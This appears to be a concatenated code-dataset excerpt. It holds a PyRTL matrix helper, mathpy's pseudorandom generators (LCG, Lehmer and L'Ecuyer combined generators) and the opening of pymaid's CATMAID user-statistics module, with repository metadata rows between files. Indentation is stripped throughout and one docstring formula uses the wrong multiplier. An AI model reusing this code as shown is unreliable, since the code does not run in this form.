This function is helpful for turning a pure Python list of lists
into an integer suitable for creating a Constant wirevector that can
be passed in as a Matrix initializer's `value` argument, or for
passing into a Simulation's step function for a particular input wire.
For example, calling Matrix.list_to_int([[3, 5], [7, 9]], 4) produces 13,689,
which in binary looks like this::
0011 0101 0111 1001
Note how the elements of the list of lists were added, 4 bits at a time,
in row order, such that the element at row 0, column 0 is in the most significant
4 bits, and the element at row 1, column 1 is in the least significant 4 bits.
Here's an example of using it in simulation::
a_vals = [[0, 1], [2, 3]]
b_vals = [[2, 4, 6], [8, 10, 12]]
a_in = pyrtl.Input(4 * 4, 'a_in')
b_in = pyrtl.Input(6 * 4, 'b_in')
a = Matrix.Matrix(2, 2, 4, value=a_in)
b = Matrix.Matrix(2, 3, 4, value=b_in)
...
sim = pyrtl.Simulation()
sim.step({
'a_in': Matrix.list_to_int(a_vals, 4),
'b_in': Matrix.list_to_int(b_vals, 4)
})
'''
if n_bits <= 0:
raise PyrtlError("Number of bits per element must be positive, instead got %d" % n_bits)
result = 0
for i in range(len(matrix)):
for j in range(len(matrix[0])):
val = formatted_str_to_val(str(matrix[i][j]), 's' + str(n_bits))
result = (result << n_bits) | val
return result
|
bsd-3-clause
| 5,829,635,579,326,780,000
| 37.966429
| 99
| 0.54151
| false
| 4.166259
| false
| false
| false
|
aschleg/mathpy
|
mathpy/random/random.py
|
1
|
12138
|
# encoding=utf8
import random
import sys
import numpy as np
from mathpy.numtheory import isrelativelyprime
def lcg(n, seed=None):
r"""
Implementation of a linear congruential generator for generating n random samples in U(0, 1).
Parameters
----------
n : int
The number of random samples to generate
seed : int, default None
Seed to initialize the generator state. If None, a seed is drawn from the
standard library's random module.
Returns
-------
array-like
numpy array of length :math:`n` of randomly generated numbers in the range :math:`U(0, 1)`.
Raises
------
ValueError
number of randomly generated values to return must be at least one.
Notes
-----
Linear congruential generators (LCGs) are a class of pseudorandom number generator (PRNG)
algorithms used for generating sequences of random-like numbers. The generation of random
numbers plays a large role in many applications ranging from cryptography to Monte Carlo
methods. Linear congruential generators are one of the oldest and most well-known methods
for generating random numbers, primarily due to their comparative ease of implementation,
speed, and small memory footprint. Other methods such as the Mersenne Twister are
much more common in practical use today.
Linear congruential generators are defined by a recurrence relation:
.. math::
\large{X_{i+1} = (aX_i + c) \space \text{mod} \space m}
There are many choices for the parameters :math:`m`, the modulus, :math:`a`, the multiplier,
and :math:`c` the increment. Wikipedia has a seemingly comprehensive list of the parameters
in common use here:
https://en.wikipedia.org/wiki/Linear_congruential_generator#Parameters_in_common_use
References
----------
Saucier, R. (2000). Computer Generation of Statistical Distributions (1st ed.).
Aberdeen, MD. Army Research Lab.
"""
if n < 1:
    raise ValueError('number of randomly generated values to return must be at least one')
rn = np.empty(n, np.float64)
m = 2 ** 32
a = 1103515245
c = 12345
if seed is None:
d = random.randrange(sys.maxsize)
else:
d = seed
d = (a * d + c) % m
for i in np.arange(n):
d = (a * d + c) % m
rn[i] = d / m
return rn
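# A minimal, self-contained illustration of a single LCG step using the
# glibc-style parameters above (illustrative only, not part of mathpy's API).
def _lcg_step_example(x, a=1103515245, c=12345, m=2 ** 32):
    """Advance the LCG state once; return (new_state, U(0, 1) sample)."""
    x = (a * x + c) % m
    return x, x / m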
def mcg(n, seed=None):
r"""
Implementation of a Lehmer random number generator, also known as a multiplicative congruential
generator for generating n random samples in U(0, 1).
Parameters
----------
n : int
The number of random samples to generate
seed : int, default None
Seed to initialize the generator state. If None, a seed is drawn from the
standard library's random module; the seed is then incremented until it is
relatively prime to the modulus.
Returns
-------
array-like:
numpy array of length :math:`n` of randomly generated numbers in the range :math:`U(0, 1)`.
Notes
-----
Multiplicative congruential generators, also known as Lehmer random number generators, is a
type of linear congruential generator for generating pseudorandom numbers in :math:`U(0, 1)`.
The multiplicative congruential generator, often abbreviated as MLCG or MCG, is defined as a
recurrence relation similar to the LCG with :math:`c = 0`.
.. math::
X_{i+1} = aX_i \space \text{mod} \space m
Unlike the LCG, the parameters :math:`a` and :math:`m` for multiplicative congruential generators are more
restricted and the initial seed :math:`X_0` must be relatively prime to the modulus :math:`m` (the greatest
common divisor between :math:`X_0` and :math:`m` is :math:`1`). The current parameters in common use are
:math:`m = 2^{31} - 1 = 2,147,483,647` and :math:`a = 7^5 = 16,807`. However, in a correspondence from
the Communications of the ACM, Park, Miller and Stockmeyer changed the value of the parameter
:math:`a`, stating:
"The minimal standard Lehmer generator we advocated had a modulus of m = 2^31 - 1 and a multiplier
of a = 16807. Relative to this particular choice of multiplier, we wrote "... if this paper were
to be written again in a few years it is quite possible that we would advocate a different
multiplier .... " We are now prepared to do so. That is, we now advocate a = 48271 and, indeed,
have done so "officially" since July 1990. This new advocacy is consistent with the discussion on
page 1198 of [10]. There is nothing wrong with 16807; we now believe, however, that 48271 is a little
better (with q = 44488, r = 3399).
When using a large prime modulus :math:`m` such as :math:`2^{31} - 1`, the multiplicative
congruential generator can overflow. Schrage's method was invented to overcome the possibility
of overflow, and is applicable whenever :math:`a(m \space \text{mod} \space a) < m`; one can
check that the parameters in use here satisfy this condition.
Schrage's method restates the modulus :math:`m` as a decomposition :math:`m = aq + r` where
:math:`r = m \space \text{mod} \space a` and :math:`q = \lfloor m / a \rfloor`.
.. math::
ax \space \text{mod} \space m = \begin{cases}
a(x \space \text{mod} \space q) - r \lfloor x / q \rfloor & \text{if the result is} \geq 0 \\
a(x \space \text{mod} \space q) - r \lfloor x / q \rfloor + m & \text{otherwise} \end{cases}
References
----------
Anne Gille-Genest (March 1, 2012).
Implementation of the Pseudo-Random Number Generators and the Low Discrepancy Sequences.
Saucier, R. (2000). Computer Generation of Statistical Distributions (1st ed.). Aberdeen, MD. Army Research Lab.
Stephen K. Park; Keith W. Miller; Paul K. Stockmeyer (1988). "Technical Correspondence".
Communications of the ACM. 36 (7): 105-110.
"""
rn = np.empty(n, dtype=np.float64)
m = 2147483647
a = 48271 # 16807
q = 44488 # 127773
r = 3399 # 2836
if seed is None:
s = random.randrange(sys.maxsize)
else:
s = seed
while isrelativelyprime(s, m) is False:
s += 1
for i in np.arange(n):
h = s // q
l = s % q
t = a * l - r * h
if t > 0:
s = t
else:
s = t + m
rn[i] = s / m
return rn
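# Self-contained sketch of Schrage's method with the parameters used above
# (illustrative only, not part of mathpy's API): for any 0 < x < m it
# returns (a * x) % m without the product a * x ever being formed, which is
# what prevents overflow in fixed-width (e.g. 32-bit) arithmetic.
def _schrage_example(x, a=48271, m=2147483647):
    q, r = m // a, m % a   # decompose m = a*q + r; here q = 44488, r = 3399
    t = a * (x % q) - r * (x // q)
    return t if t > 0 else t + m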
def clcg_32bit(n, seed=None):
r"""
Implementation of a combined linear congruential generator suited for 32-bit processors as proposed by
L'Ecuyer.
Parameters
----------
n : int
The number of random samples to generate
seed : int, default None
Seed to initialize the two underlying generators. If None, random seeds
are drawn from the standard library's random module.
Returns
-------
array-like
numpy array of length :math:`n` of randomly generated numbers in the range :math:`U(0, 1)`.
Notes
-----
Combined linear congruential generators are a type of PRNG (pseudorandom number generator) that combine
two or more LCGs (linear congruential generators). The combination of two or more LCGs into one random
number generator can result in a marked increase in the period length of the generator which makes them
better suited for simulating more complex systems. The combined linear congruential generator algorithm is
defined as:
.. math::
X_i \equiv \Bigg(\sum^k_{j=1} (-1)^{j-1} Y_{i,j} \Bigg) \space (\text{mod} \space (m_1 - 1))
Where :math:`m_1` is the modulus of the LCG, :math:`Y_{i,j}` is the :math:`ith` input from the :math:`jth`
LCG and :math:`X_i` is the :math:`ith` random generated value.
L'Ecuyer describes a combined linear generator that utilizes two LCGs in *Efficient and Portable Combined
Random Number Generators* for 32-bit processors. To be precise, the congruential generators used are
actually multiplicative since :math:`c_1 = c_2 = 0`. The parameters used for the MCGs are:
.. math::
a_1 = 40014 \qquad m_1 = 2147483563 \qquad a_2 = 40692 \qquad m_2 = 2147483399
The combined linear congruential generator algorithm proposed by L'Ecuyer can be described with the
following steps:
The two MCGs, :math:`Y_{0,1}, \space Y_{0,2}`, are seeded. The seed values are recommended to be in the
range :math:`[1, m_1 - 1]` and :math:`[1, m_2 - 1]`, respectively.
Next, the two MCGs are evaluated using the algorithm above:
.. math::
Y_{i+1,1} = a_1 \times Y_{i,1} (\text{mod} \space m_1) \qquad Y_{i+1,2} = a_1 \times Y_{i,2}
(\text{mod} \space m_2)
With :math:`Y_{i+1,1} \text{and} Y_{i+1,2}` evaluated, find :math:`X_{i+1}`
.. math::
X_{i+1} = (Y_{i+1,1} - Y_{i+1,2}) \space \text{mod} \space m_1 - 1
Finally, the random number to be output can be generated:
.. math::
R_{i+1} = \begin{cases} \frac{X_{i+1}}{m_1} & \text{for} \space X_{i+1} > 0 \\
(\frac{X_{i+1}}{m_1}) + 1 & \text{for} \space X_{i+1} < 0 \\
\frac{(m_1 - 1)}{m_1} & \text{for} \space X_{i+1} = 0 \end{cases}
References
----------
Combined Linear Congruential Generator. (2017, July 5). In Wikipedia, The Free Encyclopedia.
From https://en.wikipedia.org/w/index.php?title=Combined_Linear_Congruential_Generator&oldid=789099445
Pierre L'Ecuyer (1988). Efficient and Portable Combined Random Number Generators.
Communications of the ACM. 31: 742-749, 774. doi:10.1145/62959.62969
Pierre L'Ecuyer, (1999) Good Parameters and Implementations for Combined Multiple Recursive Random Number Generators.
Operations Research 47(1):159-164. doi.org/10.1287/opre.47.1.159
"""
rn = np.empty(n, dtype=np.float64)
random.seed(seed)
a1, a2 = 40014, 40692
m1, m2 = 2147483563, 2147483399
y1, y2 = random.randrange(1, m1 - 1), random.randrange(1, m2 - 1)
for i in np.arange(n):
y1, y2 = a1 * y1 % m1, a2 * y2 % m2
x = (y1 - y2) % (m1 - 1)
if x > 0:
r = x / m1
elif x < 0:
r = (x / m1) + 1
else: # x == 0
r = (m1 - 1) / m1
rn[i] = r
return rn
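# A single step of the combined generator above as a standalone sketch
# (names are local to this example and not part of mathpy's API). Note that
# Python's % always yields a non-negative result, so only the x > 0 and
# x == 0 branches of L'Ecuyer's output mapping can actually occur here.
def _clcg32_step_example(y1, y2, a1=40014, a2=40692,
                         m1=2147483563, m2=2147483399):
    y1, y2 = a1 * y1 % m1, a2 * y2 % m2
    x = (y1 - y2) % (m1 - 1)
    r = x / m1 if x > 0 else (m1 - 1) / m1
    return y1, y2, r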
def clcg_16bit(n, seed=None):
r"""
Implementation of a combined linear congruential generator suited for 16-bit processors as proposed by
L'Ecuyer.
Parameters
----------
n : int
The number of random samples to generate
seed : int, default None
Seed to initialize the three underlying generators. If None, random seeds
are drawn from the standard library's random module.
Returns
-------
array-like
numpy array of length :math:`n` of randomly generated numbers in the range :math:`U(0, 1)`.
Notes
-----
The 16-bit version of the combined linear congruential generator proceeds in the same way as the 32-bit
version but uses three MCGs with the following parameters:
.. math::
a_1 = 157 \qquad m_1 = 32363 \qquad a_2 = 146 \qquad m_2 = 31727 \qquad a_3 = 142 \qquad m_3 = 31657
See Also
--------
clcg_32bit() : Function
32-bit implementation of a combined linear congruential generator as proposed by L'Ecuyer.
References
----------
Combined Linear Congruential Generator. (2017, July 5). In Wikipedia, The Free Encyclopedia.
From https://en.wikipedia.org/w/index.php?title=Combined_Linear_Congruential_Generator&oldid=789099445
Pierre L'Ecuyer (1988). Efficient and Portable Combined Random Number Generators.
Communications of the ACM. 31: 742-749, 774. doi:10.1145/62959.62969
Pierre L'Ecuyer, (1999) Good Parameters and Implementations for Combined Multiple Recursive Random Number Generators.
Operations Research 47(1):159-164. doi.org/10.1287/opre.47.1.159
"""
rn = np.empty(n, dtype=np.float64)
random.seed(seed)
a1, a2, a3 = 157, 146, 142
m1, m2, m3 = 32363, 31727, 31657
y1, y2, y3 = random.randrange(1, m1 - 1), \
random.randrange(1, m2 - 1), \
random.randrange(1, m3 - 1)
for i in np.arange(n):
y1, y2, y3 = a1 * y1 % m1, \
a2 * y2 % m2, \
a3 * y3 % m3
x = (y1 - y2 - y3) % (m1 - 1)
if x > 0:
r = x / m1
elif x < 0:
r = (x / m1) + 1
else: # x == 0
r = (m1 - 1) / m1
rn[i] = r
return rn
|
mit
| 6,682,255,296,660,250,000
| 33.682353
| 121
| 0.607896
| false
| 3.369064
| false
| false
| false
|
schlegelp/pymaid
|
pymaid/user_stats.py
|
1
|
48870
|
# This script is part of pymaid (http://www.github.com/schlegelp/pymaid).
# Copyright (C) 2017 Philipp Schlegel
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along
"""This module contains functions to retrieve user statistics.
Examples
--------
>>> import pymaid
>>> myInstance = pymaid.CatmaidInstance('https://www.your.catmaid-server.org',
... api_token='YOURTOKEN',
... http_user='HTTP_USER', # omit if not required
... http_password='HTTP_PASSWORD')
>>> skeleton_ids = pymaid.get_skids_by_annotation('Hugin')
>>> cont = pymaid.get_user_contributions(skeleton_ids)
>>> cont
user nodes presynapses postsynapses
0 Schlegel 47221 470 1408
1 Tran 1645 7 4
2 Lacin 1300 1 20
3 Li 1244 5 45
...
>>> # Get the time that each user has invested
>>> time_inv = pymaid.get_time_invested(skeleton_ids,
... remote_instance = myInstance)
>>> time_inv
user total creation edition review
0 Schlegel 4649 3224 2151 1204
1 Tran 174 125 59 0
2 Li 150 114 65 0
3 Lacin 133 119 30 0
...
>>> # Plot contributions as pie chart
>>> import plotly
>>> fig = {"data": [{"values": time_inv.total.tolist(),
... "labels": time_inv.user.tolist(),
... "type": "pie"}]}
>>> plotly.offline.plot(fig)
"""
# TODOs
# - Github punch card-like figure
import datetime
import pandas as pd
import numpy as np
from . import core, fetch, utils, config
# Set up logging
logger = config.logger
__all__ = ['get_user_contributions', 'get_time_invested', 'get_user_actions',
'get_team_contributions', 'get_user_stats']
def get_user_stats(start_date=None, end_date=None, remote_instance=None):
"""Get user stats similar to the pie chart statistics widget in CATMAID.
Returns cable [nm], nodes created/reviewed and connector links created.
Parameters
----------
start_date : tuple | datetime.date, optional
end_date : tuple | datetime.date, optional
Start and end date of time window to check. If
``None``, will use entire project history.
remote_instance : CatmaidInstance, optional
Either pass explicitly or define globally.
Returns
-------
pandas.DataFrame
Dataframe in which each row represents a user::
cable nodes_created nodes_reviewed links_created
username
user1 ...
user2 ...
Examples
--------
Create a pie chart similar to the stats widget in CATMAID:
>>> import matplotlib.pyplot as plt
>>> stats = pymaid.get_user_stats()
>>> stats_to_plot = ['cable', 'nodes_created', 'nodes_reviewed',
... 'links_created']
>>> fig, axes = plt.subplots(1, len(stats_to_plot), figsize=(12, 4))
>>> for s, ax in zip(stats_to_plot, axes):
... # Get the top 10 contributors for this stat
... this_stats = stats[s].sort_values(ascending=False).iloc[:10]
... # Calculate "others"
... this_stats.loc['others'] = stats[s].sort_values(ascending=False).iloc[10:].sum()
... # Plot
... this_stats.plot.pie(ax=ax, textprops={'size': 6},
... explode=[.05] * this_stats.shape[0],
... rotatelabels=True)
... # Make labels a bit smaller
... ax.set_ylabel(s.replace('_', ' '), fontsize=8)
>>> plt.show()
See Also
--------
:func:`~pymaid.get_history`
Returns day-by-day stats.
"""
remote_instance = utils._eval_remote_instance(remote_instance)
if isinstance(start_date, type(None)):
start_date = datetime.date(2010, 1, 1)
elif not isinstance(start_date, datetime.date):
start_date = datetime.date(*start_date)
if isinstance(end_date, type(None)):
end_date = datetime.date.today()
elif not isinstance(end_date, datetime.date):
end_date = datetime.date(*end_date)
# Get and summarize other stats
hist = fetch.get_history(remote_instance=remote_instance,
start_date=start_date,
end_date=end_date)
stats = pd.concat([hist.cable.sum(axis=1),
hist.treenodes.sum(axis=1),
hist.reviewed.sum(axis=1),
hist.connector_links.sum(axis=1)],
axis=1, sort=True).fillna(0).astype(int)
stats.index.name = 'username'
stats.columns = ['cable', 'nodes_created', 'nodes_reviewed',
'links_created']
stats.sort_values('nodes_created', ascending=False, inplace=True)
return stats
def get_team_contributions(teams, neurons=None, remote_instance=None):
"""Get contributions by teams (nodes, reviews, connectors, time invested).
Notes
-----
1. Time calculation uses defaults from :func:`pymaid.get_time_invested`.
2. ``total_reviews`` > ``total_nodes`` is possible if nodes have been
reviewed multiple times by different users. Similarly,
``total_reviews`` = ``total_nodes`` does not imply that the neuron
is fully reviewed!
Parameters
----------
teams : dict
Teams to group contributions for. Users must be logins.
Format can be either:
1. Simple user assignments. For example::
{'teamA': ['user1', 'user2'],
'team2': ['user3'], ...}
2. Users with start and end dates. Start and end date
must be either ``datetime.date`` or a single
``pandas.date_range`` object. For example::
{'team1': {
'user1': (datetime.date(2017, 1, 1),
datetime.date(2018, 1, 1)),
'user2': (datetime.date(2016, 6, 1),
datetime.date(2017, 1, 1))
},
'team2': {
'user3': pandas.date_range('2017-1-1',
'2018-1-1'),
}}
Mixing both styles is permissible. For second style,
use e.g. ``'user1': None`` for no date restrictions
on that user.
neurons : skeleton ID(s) | CatmaidNeuron/List, optional
Restrict check to given set of neurons. If
CatmaidNeuron/List, will use this neurons nodes/
connectors. Use to subset contributions e.g. to a given
neuropil by pruning neurons before passing to this
function.
remote_instance : CatmaidInstance, optional
Either pass explicitly or define globally.
Returns
-------
pandas.DataFrame
DataFrame in which each row represents a neuron. Example for two teams,
``teamA`` and ``teamB``::
skeleton_id total_nodes teamA_nodes teamB_nodes ...
0
1
total_reviews teamA_reviews teamB_reviews ...
0
1
total_connectors teamA_connectors teamB_connectors ...
0
1
total_time teamA_time teamB_time
0
1
Examples
--------
>>> from datetime import date
>>> import pandas as pd
>>> teams = {'teamA': ['user1', 'user2'],
... 'teamB': {'user3': None,
... 'user4': (date(2017, 1, 1), date(2018, 1, 1))},
... 'teamC': {'user5': pd.date_range('2015-1-1', '2018-1-1')}}
>>> stats = pymaid.get_team_contributions(teams)
See Also
--------
:func:`~pymaid.get_contributor_statistics`
Gives you more basic info on neurons of interest
such as total reconstruction/review time.
:func:`~pymaid.get_time_invested`
Time invested by individual users. Gives you more
control over how time is calculated.
"""
remote_instance = utils._eval_remote_instance(remote_instance)
# Prepare teams
if not isinstance(teams, dict):
raise TypeError('Expected teams of type dict, got '
'{}'.format(type(teams)))
beginning_of_time = datetime.date(1900, 1, 1)
today = datetime.date.today()
all_time = pd.date_range(beginning_of_time, today)
for t in teams:
if isinstance(teams[t], list):
teams[t] = {u: all_time for u in teams[t]}
elif isinstance(teams[t], dict):
for u in teams[t]:
if isinstance(teams[t][u], type(None)):
teams[t][u] = all_time
elif isinstance(teams[t][u], (tuple, list)):
try:
teams[t][u] = pd.date_range(*teams[t][u])
except BaseException:
raise Exception('Error converting "{}" to pandas.'
'date_range'.format(teams[t][u]))
elif isinstance(teams[t][u],
pd.core.indexes.datetimes.DatetimeIndex):
pass
else:
raise TypeError('Expected user dates to be either None, tuple '
'of datetimes or pandas.date_range, '
'got {}'.format(type(teams[t][u])))
else:
raise TypeError('Expected teams to be either lists or dicts of '
'users, got {}'.format(type(teams[t])))
# Get all users
all_users = [u for t in teams for u in teams[t]]
# Prepare neurons - download if necessary
if not isinstance(neurons, type(None)):
if isinstance(neurons, core.CatmaidNeuron):
neurons = core.CatmaidNeuronList(neurons)
elif isinstance(neurons, core.CatmaidNeuronList):
pass
else:
neurons = fetch.get_neurons(neurons,
remote_instance=remote_instance)
else:
all_dates = [d.date() for t in teams for u in teams[t] for d in teams[t][u]]
neurons = fetch.find_neurons(users=all_users,
from_date=min(all_dates),
to_date=max(all_dates),
remote_instance=remote_instance)
neurons.get_skeletons()
# Get user list
user_list = fetch.get_user_list(remote_instance=remote_instance).set_index('login')
for u in all_users:
if u not in user_list.index:
raise ValueError('User "{}" not found in user list'.format(u))
# Get all node details
all_node_details = fetch.get_node_details(neurons,
remote_instance=remote_instance)
# Get connector links
link_details = fetch.get_connector_links(neurons, remote_instance=remote_instance)
# link_details contains all links. We have to subset this to existing
# connectors in case the input neurons have been pruned
link_details = link_details[link_details.connector_id.isin(neurons.connectors.connector_id.values)]
interval = 3
bin_width = '%iMin' % interval
minimum_actions = 10 * interval
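# In other words: timestamps are grouped into 3-minute windows and a window
# only counts towards time invested if it contains at least 30 actions;
# each qualifying window then contributes `interval` (3) minutes.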
stats = []
for n in config.tqdm(neurons, desc='Processing',
disable=config.pbar_hide, leave=config.pbar_leave):
# Get node details
tn_ids = n.nodes.node_id.values.astype(str)
cn_ids = n.connectors.connector_id.values.astype(str)
current_status = config.pbar_hide
config.pbar_hide = True
node_details = all_node_details[all_node_details.node_id.isin(np.append(tn_ids, cn_ids))]
config.pbar_hide = current_status
# Extract node creation
node_creation = node_details.loc[node_details.node_id.isin(tn_ids),
['creator', 'creation_time']].values
node_creation = np.c_[node_creation, ['node_creation'] * node_creation.shape[0]]
# Extract connector creation
cn_creation = node_details.loc[node_details.node_id.isin(cn_ids),
['creator', 'creation_time']].values
cn_creation = np.c_[cn_creation, ['cn_creation'] * cn_creation.shape[0]]
# Extract edition times (treenodes + connectors)
node_edits = node_details.loc[:, ['editor', 'edition_time']].values
node_edits = np.c_[node_edits, ['editor'] * node_edits.shape[0]]
# Link creation
link_creation = link_details.loc[link_details.connector_id.isin(cn_ids),
['creator', 'creation_time']].values
link_creation = np.c_[link_creation, ['link_creation'] * link_creation.shape[0]]
# Extract review times
reviewers = [u for l in node_details.reviewers.values for u in l]
timestamps = [ts for l in node_details.review_times.values for ts in l]
node_review = np.c_[reviewers, timestamps, ['review'] * len(reviewers)]
# Merge all timestamps (ignore edits for now) to get time_invested
all_ts = pd.DataFrame(np.vstack([node_creation,
node_review,
cn_creation,
link_creation,
node_edits]),
columns=['user', 'timestamp', 'type'])
# Add column with just the date and make it the index
all_ts['date'] = all_ts.timestamp.values.astype('datetime64[D]')
all_ts.index = pd.to_datetime(all_ts.date)
# Fill in teams for each timestamp based on user + date
all_ts['team'] = None
for t in teams:
for u in teams[t]:
# Assign all timestamps by this user in the right time to
# this team
existing_dates = (teams[t][u] & all_ts.index).unique()
ss = (all_ts.index.isin(existing_dates)) & (all_ts.user.values == user_list.loc[u, 'id'])
all_ts.loc[ss, 'team'] = t
# Get total
total_time = sum(all_ts.timestamp.to_frame().set_index(
'timestamp', drop=False).groupby(pd.Grouper(freq=bin_width)).count().values >= minimum_actions)[0] * interval
this_neuron = [n.skeleton_id, n.n_nodes, n.n_connectors,
node_review.shape[0], total_time]
# Go over the teams and collect values
for t in teams:
# Subset to team
this_team = all_ts[all_ts.team == t]
if this_team.shape[0] > 0:
# Subset to user ID
team_time = sum(this_team.timestamp.to_frame().set_index(
'timestamp', drop=False).groupby(pd.Grouper(freq=bin_width)).count().values >= minimum_actions)[0] * interval
team_nodes = this_team[this_team['type'] == 'node_creation'].shape[0]
team_cn = this_team[this_team['type'] == 'cn_creation'].shape[0]
team_rev = this_team[this_team['type'] == 'review'].shape[0]
else:
team_nodes = team_cn = team_rev = team_time = 0
this_neuron += [team_nodes, team_cn, team_rev, team_time]
stats.append(this_neuron)
cols = ['skeleton_id', 'total_nodes', 'total_connectors',
'total_reviews', 'total_time']
for t in teams:
for s in ['nodes', 'connectors', 'reviews', 'time']:
cols += ['{}_{}'.format(t, s)]
stats = pd.DataFrame(stats, columns=cols)
cols_ordered = ['skeleton_id'] + ['{}_{}'.format(t, v) for v in
['nodes', 'connectors',
'reviews', 'time'] for t in ['total'] + list(teams)]
stats = stats[cols_ordered]
return stats
def get_user_contributions(x, teams=None, remote_instance=None):
"""Return number of nodes and synapses contributed by each user.
This is essentially a wrapper for :func:`pymaid.get_contributor_statistics`
- if you are also interested in e.g. construction time, review time, etc.
you may want to consider using :func:`~pymaid.get_contributor_statistics`
instead.
Parameters
----------
x
Which neurons to check. Can be either:
1. skeleton IDs (int or str)
2. neuron name (str, must be exact match)
3. annotation: e.g. 'annotation:PN right'
4. CatmaidNeuron or CatmaidNeuronList object
teams : dict, optional
Teams to group contributions for. Users must be logins::
{'teamA': ['user1', 'user2'], 'team2': ['user3'], ...}
Users not part of any team will be grouped as team
``'others'``.
remote_instance : CatmaidInstance, optional
Either pass explicitly or define globally.
Returns
-------
pandas.DataFrame
DataFrame in which each row represents a user::
user nodes presynapses postsynapses nodes_reviewed
0
1
...
Examples
--------
>>> import matplotlib.pyplot as plt
>>> # Get contributors for a single neuron
>>> cont = pymaid.get_user_contributions(2333007)
>>> # Get top 10 (by node contribution)
>>> top10 = cont.iloc[:10].set_index('user')
>>> # Plot as bar chart
>>> ax = top10.plot(kind='bar')
>>> plt.show()
>>> # Plot relative contributions
>>> cont = pymaid.get_user_contributions(2333007)
>>> cont = cont.set_index('user')
>>> # Normalize
>>> cont_rel = cont / cont.sum(axis=0).values
>>> # Plot contributors with >5% node contributions
>>> ax = cont_rel[cont_rel.nodes > .05].plot(kind='bar')
>>> plt.show()
See Also
--------
:func:`~pymaid.get_contributor_statistics`
Gives you more basic info on neurons of interest
such as total reconstruction/review time.
"""
if not isinstance(teams, type(None)):
# Prepare teams
if not isinstance(teams, dict):
raise TypeError('Expected teams of type dict, got '
'{}'.format(type(teams)))
for t in teams:
if not isinstance(teams[t], list):
raise TypeError('Teams need to be lists of user logins, '
'got {}'.format(type(teams[t])))
# Turn teams into a login -> team dict
teams = {u: t for t in teams for u in teams[t]}
remote_instance = utils._eval_remote_instance(remote_instance)
skids = utils.eval_skids(x, remote_instance=remote_instance)
cont = fetch.get_contributor_statistics(skids,
remote_instance=remote_instance,
separate=False)
all_users = set(list(cont.node_contributors.keys()) + list(cont.pre_contributors.keys()) + list(cont.post_contributors.keys()) + list(cont.review_contributors.keys()))
stats = {
'nodes': {u: 0 for u in all_users},
'presynapses': {u: 0 for u in all_users},
'postsynapses': {u: 0 for u in all_users},
'nodes_reviewed': {u: 0 for u in all_users}
}
for u in cont.node_contributors:
stats['nodes'][u] = cont.node_contributors[u]
for u in cont.pre_contributors:
stats['presynapses'][u] = cont.pre_contributors[u]
for u in cont.post_contributors:
stats['postsynapses'][u] = cont.post_contributors[u]
for u in cont.review_contributors:
stats['nodes_reviewed'][u] = cont.review_contributors[u]
stats = pd.DataFrame([[u, stats['nodes'][u],
stats['presynapses'][u],
stats['postsynapses'][u],
stats['nodes_reviewed'][u]] for u in all_users],
columns=['user', 'nodes', 'presynapses',
'postsynapses', 'nodes_reviewed']
).sort_values('nodes', ascending=False).reset_index(drop=True)
if isinstance(teams, type(None)):
return stats
stats['team'] = [teams.get(u, 'others') for u in stats.user.values]
return stats.groupby('team').sum()
def get_time_invested(x, mode='SUM', by='USER', minimum_actions=10,
max_inactive_time=3, treenodes=True, connectors=True,
links=True, start_date=None, end_date=None,
remote_instance=None):
"""Calculate the time spent working on a set of neurons.
Use ``minimum_actions`` and ``max_inactive_time`` to fine tune how time
invested is calculated: by default, time is binned over 3 minutes in
which a user has to perform 3x10 actions for that interval to be
counted towards the time spent tracing.
Important
---------
Creation/Edition/Review times can overlap! This is why total time spent
is not just creation + edition + review.
Please note that this does currently not take placement of
pre-/postsynaptic nodes into account!
Be aware of the ``minimum_actions`` parameter: at low values even
a single action (e.g. connecting a node) will add considerably to time
invested. To keep total reconstruction time comparable to what Catmaid
calculates, you should consider about 10 actions/minute (= a click every
6 seconds) and ``max_inactive_time`` of 3 mins.
CATMAID gives reconstruction time across all users. Here, we calculate
the time spent tracing for individuals. This may lead to a discrepancy
between the sum of time invested over all users from this function and
CATMAID's reconstruction time.
Parameters
----------
x
Which neurons to check. Can be either:
1. skeleton IDs (int or str)
2. neuron name (str, must be exact match)
3. annotation: e.g. 'annotation:PN right'
4. CatmaidNeuron or CatmaidNeuronList object
If you pass a CatmaidNeuron/List, its node/connectors
are used to calculate time invested. You can exploit
this to get time spent reconstructing in given
compartment of a neurons, e.g. by pruning it to a
volume before passing it to ``get_time_invested``.
mode : 'SUM' | 'SUM2' | 'OVER_TIME' | 'ACTIONS', optional
(1) 'SUM' will return total time invested (in minutes)
broken down by creation, edition and review.
(2) 'SUM2' will return total time invested (in
minutes) broken down by `treenodes`, `connectors`
and `links`.
(3) 'OVER_TIME' will return minutes invested/day over
time.
(4) 'ACTIONS' will return actions
(node/connectors placed/edited) per day.
by : 'USER' | 'NEURON', optional
Determines whether the stats are broken down by user or
by neuron.
minimum_actions : int, optional
Minimum number of actions per minute to be counted as
active.
max_inactive_time : int, optional
Interval in minutes over which time invested is
binned. Essentially determines how much time can be
between bouts of activity.
treenodes : bool, optional
If False, treenodes will not be taken into account.
connectors : bool, optional
If False, connectors will not be taken into account.
links : bool, optional
If False, connector links will not be taken into account.
start_date : iterable | datetime.date | numpy.datetime64, optional
Restricts time invested to window. Applies to creation
but not edition time! If iterable, must be year, month
day, e.g. ``[2018, 1, 1]``.
end_date : iterable | datetime.date | numpy.datetime64, optional
See ``start_date``.
remote_instance : CatmaidInstance, optional
Either pass explicitly or define globally.
Returns
-------
pandas.DataFrame
If ``mode='SUM'``, values represent minutes invested::
total creation edition review
user1
user2
..
.
If ``mode='SUM2'``, values represent minutes invested::
total treenodes connectors links
user1
user2
..
.
If ``mode='OVER_TIME'`` or ``mode='ACTIONS'``::
date1 date2 date3 ...
user1
user2
..
.
For `OVER_TIME`, values represent minutes invested on that day. For
`ACTIONS`, values represent actions (creation, edition, review) on that
day.
Examples
--------
Get time invested for a set of neurons:
>>> da1 = pymaid.get_neurons('annotation:glomerulus DA1')
>>> time = pymaid.get_time_invested(da1)
Get time spent tracing in a specific compartment:
>>> da1_lh = da1.prune_by_volume('LH_R', inplace=False)
>>> time_lh = pymaid.get_time_invested(da1_lh)
Get contributions within a given time window:
>>> time_jan = pymaid.get_time_invested(da1,
... start_date=[2018, 1, 1],
... end_date=[2018, 1, 31])
